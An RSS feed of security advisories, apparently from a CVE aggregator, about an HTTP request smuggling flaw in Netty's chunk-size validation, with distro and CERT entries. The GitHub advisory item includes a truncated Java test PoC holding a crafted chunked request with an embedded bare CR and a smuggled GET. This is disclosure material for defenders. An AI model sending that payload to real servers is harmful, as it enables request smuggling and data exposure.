<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Fri, 02 Oct 2026 10:00:51 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-374459</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-374459</link>
      <description>EUVD-2026-374459</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-374459</guid>
    </item>
    <item>
      <title>fkie_cve-2026-93566</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-93566</link>
      <description>&lt;p&gt;A flaw was found in Netty. A remote attacker could exploit this by sending a specially crafted HTTP request that includes control characters within the chunk-size line. This bypasses the intended strict validation, allowing the attacker to inject arbitrary HTTP requests. This vulnerability can lead to HTTP request smuggling, potentially resulting in information disclosure or other unauthorized actions.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;A flaw was found in Netty. A remote attacker could exploit this by sending a specially crafted HTTP request that includes control characters within the chunk-size line. This bypasses the intended strict validation, allowing the attacker to inject arbitrary HTTP requests. This vulnerability can lead to HTTP request smuggling, potentially resulting in information disclosure or other unauthorized actions.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-93566</guid>
    </item>
    <item>
      <title>GHSA-9mrj-55p4-qwf4</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-9mrj-55p4-qwf4</link>
      <description>&lt;p&gt;### Summary
Netty skips strict chunk size line validation when the line has no chunk extension (`;`), so a chunk size line containing an embedded bare CR (e.g. `0\rX`) is accepted instead of rejected, enabling HTTP request smuggling.&lt;/p&gt;
&lt;p&gt;### Details
`io.netty.handler.codec.http.HttpObjectDecoder#checkChunkExtensions` only runs the strict validator `HttpChunkLineValidatingByteProcessor` when a `;` is present:&lt;/p&gt;
&lt;p&gt;```java
        int extensionsStart = line.bytesBefore((byte) &amp;#39;;&amp;#39;);
        if (extensionsStart == -1) {
            return;
        }
```&lt;/p&gt;
&lt;p&gt;According to RFC 9112 https://datatracker.ietf.org/doc/html/rfc9112#appendix-A&lt;/p&gt;
&lt;p&gt;`chunk-size = 1*HEXDIG`&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;```java
@Test
public void test() {
    String requestStr = &amp;#34;POST / HTTP/1.1\r\n&amp;#34; +
            &amp;#34;Host: localhost\r\n&amp;#34; +
            &amp;#34;Transfer-Encoding: chunked\r\n\r\n&amp;#34; +
            &amp;#34;0\rX\r\n&amp;#34; +
            &amp;#34;\r\n&amp;#34; +
            &amp;#34;GET /smuggled HTTP/1.1\r\n&amp;#34; +
            &amp;#34;Host: localhost\r\n&amp;#34; +
            &amp;#34;Content-Length: 0\r\n&amp;#34; +
            &amp;#34;\r\n&amp;#34;;&lt;/p&gt;
&lt;p&gt;EmbeddedChannel channel = new EmbeddedChannel(new HttpRequestDecoder());
    assertTrue(channel.writeInbound(Unpooled.copiedBuffer(requestStr, Ch&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;### Summary
Netty skips strict chunk size line validation when the line has no chunk extension (`;`), so a chunk size line containing an embedded bare CR (e.g. `0\rX`) is accepted instead of rejected, enabling HTTP request smuggling.&lt;/p&gt;
&lt;p&gt;### Details
`io.netty.handler.codec.http.HttpObjectDecoder#checkChunkExtensions` only runs the strict validator `HttpChunkLineValidatingByteProcessor` when a `;` is present:&lt;/p&gt;
&lt;p&gt;```java
        int extensionsStart = line.bytesBefore((byte) &amp;#39;;&amp;#39;);
        if (extensionsStart == -1) {
            return;
        }
```&lt;/p&gt;
&lt;p&gt;According to RFC 9112 https://datatracker.ietf.org/doc/html/rfc9112#appendix-A&lt;/p&gt;
&lt;p&gt;`chunk-size = 1*HEXDIG`&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;```java
@Test
public void test() {
    String requestStr = &amp;#34;POST / HTTP/1.1\r\n&amp;#34; +
            &amp;#34;Host: localhost\r\n&amp;#34; +
            &amp;#34;Transfer-Encoding: chunked\r\n\r\n&amp;#34; +
            &amp;#34;0\rX\r\n&amp;#34; +
            &amp;#34;\r\n&amp;#34; +
            &amp;#34;GET /smuggled HTTP/1.1\r\n&amp;#34; +
            &amp;#34;Host: localhost\r\n&amp;#34; +
            &amp;#34;Content-Length: 0\r\n&amp;#34; +
            &amp;#34;\r\n&amp;#34;;&lt;/p&gt;
&lt;p&gt;EmbeddedChannel channel = new EmbeddedChannel(new HttpRequestDecoder());
    assertTrue(channel.writeInbound(Unpooled.copiedBuffer(requestStr, Ch&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-9mrj-55p4-qwf4</guid>
    </item>
    <item>
      <title>openSUSE-SU-2026:11882-1 — netty-4.1.138-1.1 on GA media</title>
      <link>https://cve.radiocsirt.org/vuln/opensuse-su-2026:11882-1</link>
      <description>&lt;p&gt;netty-4.1.138-1.1 on GA media&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;netty-4.1.138-1.1 on GA media&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/opensuse-su-2026:11882-1</guid>
    </item>
    <item>
      <title>UBUNTU-CVE-2026-93566</title>
      <link>https://cve.radiocsirt.org/vuln/ubuntu-cve-2026-93566</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:Pro:14.04:LTS: netty, Ubuntu:Pro:16.04:LTS: netty, Ubuntu:Pro:18.04:LTS: netty, Ubuntu:Pro:20.04:LTS: netty, Ubuntu:Pro:22.04:LTS: netty, Ubuntu:Pro:24.04:LTS: netty, Ubuntu:Pro:26.04:LTS: netty&lt;/p&gt;
&lt;p&gt;A flaw was found in Netty. A remote attacker could exploit this by sending a specially crafted HTTP request that includes control characters within the chunk-size line. This bypasses the intended strict validation, allowing the attacker to inject arbitrary HTTP requests. This vulnerability can lead to HTTP request smuggling, potentially resulting in information disclosure or other unauthorized actions.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:Pro:14.04:LTS: netty, Ubuntu:Pro:16.04:LTS: netty, Ubuntu:Pro:18.04:LTS: netty, Ubuntu:Pro:20.04:LTS: netty, Ubuntu:Pro:22.04:LTS: netty, Ubuntu:Pro:24.04:LTS: netty, Ubuntu:Pro:26.04:LTS: netty&lt;/p&gt;
&lt;p&gt;A flaw was found in Netty. A remote attacker could exploit this by sending a specially crafted HTTP request that includes control characters within the chunk-size line. This bypasses the intended strict validation, allowing the attacker to inject arbitrary HTTP requests. This vulnerability can lead to HTTP request smuggling, potentially resulting in information disclosure or other unauthorized actions.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ubuntu-cve-2026-93566</guid>
    </item>
    <item>
      <title>WID-SEC-W-2026-3477 — Netty: Mehrere Schwachstellen</title>
      <link>https://cve.radiocsirt.org/vuln/wid-sec-w-2026-3477</link>
      <description>&lt;p&gt;Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Netty ausnutzen, um Sicherheitsvorkehrungen zu umgehen, Daten zu manipulieren, vertrauliche Informationen offenzulegen oder einen Denial-of-Service-Zustand herbeizuführen.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Netty ausnutzen, um Sicherheitsvorkehrungen zu umgehen, Daten zu manipulieren, vertrauliche Informationen offenzulegen oder einen Denial-of-Service-Zustand herbeizuführen.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/wid-sec-w-2026-3477</guid>
    </item>
  </channel>
</rss>
